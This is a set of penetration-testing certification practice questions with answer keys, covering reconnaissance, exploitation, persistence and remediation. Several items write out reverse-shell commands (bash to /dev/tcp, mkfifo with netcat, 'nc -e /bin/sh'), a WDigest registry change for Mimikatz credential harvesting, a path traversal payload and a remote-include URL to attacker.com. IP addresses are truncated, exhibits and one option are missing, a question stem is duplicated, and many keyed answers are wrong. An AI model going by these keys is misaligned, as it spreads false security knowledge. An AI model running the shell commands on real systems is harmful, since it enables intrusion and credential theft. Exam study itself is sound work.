Question #1
A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?
A. The client has applied a hot fix without updating the version
B. The threat landscape has significantly changed
C. The client has updated their codebase with new features
D. There are currently no known exploits for this vulnerability
Correct answer: A
Question #2
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan. The tester runs the following command: nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 Which of the following BEST describes why multiple IP addresses are specified?
A. The network is subnetted as a /25 or greater, and the tester needed to access hosts on two different subnets
B. The tester is trying to perform a more stealthy scan by including several bogus addresses
C. The scanning machine has several interfaces to balance the scan request across at the specified rate
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host
Correct answer: A
Question #3
A penetration tester identifies the following findings during an external vulnerability scan: Which of the following attack strategies should be prioritized from the scan results above?
A. Obsolete software may contain exploitable components
B. Weak password management practices may be employed
C. Cryptographically weak protocols may be intercepted
D. Web server configurations may reveal sensitive information
Correct answer: D
Question #4
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
A. fpipe
B. ike-scan -A -t 1 --sourceip=spoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
Correct answer: B
Question #5
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security
B. Enable a secure cookie flag
C. Encrypt the communication channel
D. Sanitize invalid user input
Correct answer: A
Question #6
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
Correct answer: B
Question #7
A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?
A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing
B. Implement new training to be aware of the risks in accessing the application
C. Implement an ACL to restrict access to the application exclusively to the finance department
D. Require payroll users to change the passwords used to authenticate to the application
Correct answer: C
Question #8
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)
A. Wait outside of the company’s building and attempt to tailgate behind an employee
B. Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access
C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications
D. Search social media for information technology employees who post information about the technologies they work with
E. Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access
Correct answer: DE
Question #9
Given the following script: Which of the following BEST describes the purpose of this script?
A. Log collection
B. Event collection
C. Keystroke monitoring
D. Debug message collection
Correct answer: C
Question #10
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
Correct answer: C
Question #11
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan
Correct answer: A
Question #12
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
Correct answer: BC
Question #13
Given the following: http://example.com/download.php?id=../../../etc/passwd Which of the following BEST describes the above attack?
A. Malicious file upload attack
B. Redirect attack
C. Directory traversal attack
D. Insecure direct object reference attack
Correct answer: C
Question #14
A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?
A. Run the application through a dynamic code analyzer
B. Employ a fuzzing utility
C. Decompile the application
D. Check memory allocations
Correct answer: D
Question #15
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist
B. Block URL redirections
C. Double URL encode the parameters
D. Stop external calls from the application
Correct answer: B
Question #16
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
A. Convert to JAR
B. Decompile
C. Cross-compile the application
D. Convert JAR files to DEX
E. Re-sign the APK
F. Attach to ADB
Correct answer: AB
Question #17
A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)
A. Identify and eliminate inline SQL statements from the code
B. Identify and eliminate dynamic SQL from stored procedures
C. Identify and sanitize all user inputs
D. Use a whitelist approach for SQL statements
E. Use a blacklist approach for SQL statements
F. Identify the source of malicious input and block the IP address
Correct answer: CD
Question #18
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service
B. Complete all findings, and then submit them to the client
C. Promptly alert the client with details of the finding
D. Take the target offline so it cannot be exploited by an attacker
Correct answer: A
Question #19
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. set rhost 192
B. run autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. use auxiliary/server/socks4a
Correct answer: A
Question #20
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks: code review, updates to firewall settings. Which of the following has occurred in this situation?
A. Scope creep
B. Post-mortem review
C. Risk acceptance
D. Threat prevention
Correct answer: A
Question #21
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
A. TCP SYN flood
B. SQL injection
C. XSS
D. XMAS scan
Correct answer: B
Question #22
The following command is run on a Linux file system: chmod 4111 /usr/bin/sudo Which of the following issues may be exploited now?
A. Kernel vulnerabilities
B. Sticky bits
C. Unquoted service path
D. Misconfigured sudo
Correct answer: B
Question #23
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. Randomize local administrator credentials for each machine
B. Disable remote logons for local administrators
C. Require multifactor authentication for all logins
D. Increase minimum password complexity requirements
E. Apply additional network access control
F. Enable full-disk encryption on every workstation
G. Segment each host into its own VLAN
Correct answer: CDE
Question #24
Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?
A. Penetration test findings often contain company intellectual property
B. Penetration test findings could lead to consumer dissatisfaction if made public
C. Penetration test findings are legal documents containing privileged information
D. Penetration test findings can assist an attacker in compromising a system
Correct answer: D
Question #25
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?
A. Obtain staff information by calling the company and using social engineering techniques
B. Visit the client and use impersonation to obtain information from staff
C. Send spoofed emails to staff to see if staff will respond with sensitive information
D. Search the internet for information on staff such as social networking sites
Correct answer: D
Question #26
Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)
A. Arbitrary code execution
B. Session hijacking
C. SQL injection
D. Login credential brute-forcing
E. Cross-site request forgery
Correct answer: BD
Question #27
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?
A. nc -nlvp 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
Correct answer: D
Question #28
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
Correct answer: A
Question #29
A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?
A. Credential dump attack
B. DLL injection attack
C. Reverse shell attack
D. Pass the hash attack
Correct answer: D
Question #30
A software development team recently migrated to new application software in the on-premises environment. Penetration test findings show that multiple vulnerabilities exist. If a penetration tester does not have access to a live or test environment, it might be better to recreate the same environment on a VM. Which of the following is MOST important for confirmation?
A. Unsecure service and protocol configuration
B. Running SMB and SMTP service
C. Weak password complexity and user account
D. Misconfiguration
Correct answer: A
Question #31
Black box penetration testing strategy provides the tester with:
A. a target list
B. a network diagram
C. source code
D. privileged credentials
Correct answer: D
Question #32
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
Correct answer: A
Question #33
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ac0b556ba8 Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
Correct answer: D
Question #34
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends form field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
A. HTTP POST method
B. HTTP OPTIONS method
C. HTTP PUT method
D. HTTP TRACE method
Correct answer: A
Question #35
After performing a security assessment for a firm, the client was found to have been billed for the time the client’s test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?
A. SOW
B. NDA
C. EULA
D. (option text missing)
Correct answer: D
Question #36
Which of the following are MOST important when planning for an engagement? (Select TWO).
A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies
Correct answer: AC
Question #37
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register
Correct answer: A
Question #38
A penetration tester runs the following on a compromised system: python -c 'import pty;pty.spawn("/bin/bash")'. Which of the following actions is the tester taking?
A. Removing the Bash history
B. Upgrading the shell
C. Creating a sandbox
D. Capturing credentials
Correct answer: B
Question #39
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
Correct answer: D
Question #40
A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?
A. Karma attack
B. Deauthentication attack
C. Fragmentation attack
D. SSID broadcast flood
Correct answer: B
Question #41
A penetration tester ran the following Nmap scan on a computer: nmap -sV 192.168.1.5 The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?
A. The organization failed to disable Telnet
B. Nmap results contain a false positive for port 23
C. Port 22 was filtered
D. The service is running on a non-standard port
Correct answer: A
Question #42
Which of the following is an example of a spear phishing attack?
A. Targeting an executive with an SMS attack
B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack
Correct answer: A
Question #43
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A. Download the GHOST file to a Linux system and compile gcc -o GHOST test i:
B. Download the GHOST file to a Windows system and compile gcc -o GHOST GHOST
C. Download the GHOST file to a Linux system and compile gcc -o GHOST
D. Download the GHOST file to a Windows system and compile gcc -o GHOST test i:
Correct answer: C
Question #44
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?
A. Horizontally escalate privileges
B. Scrape the page for hidden fields
C. Analyze HTTP response code
D. Search for HTTP headers
Correct answer: D
Question #45
Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
Correct answer: D
Question #46
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz. Which of the following registry changes would allow for credential caching in memory?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0
B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Correct answer: A
Question #47
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computer names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?
A. Enumeration of services
B. OSINT gathering
C. Port scanning
D. Social engineering
Correct answer: B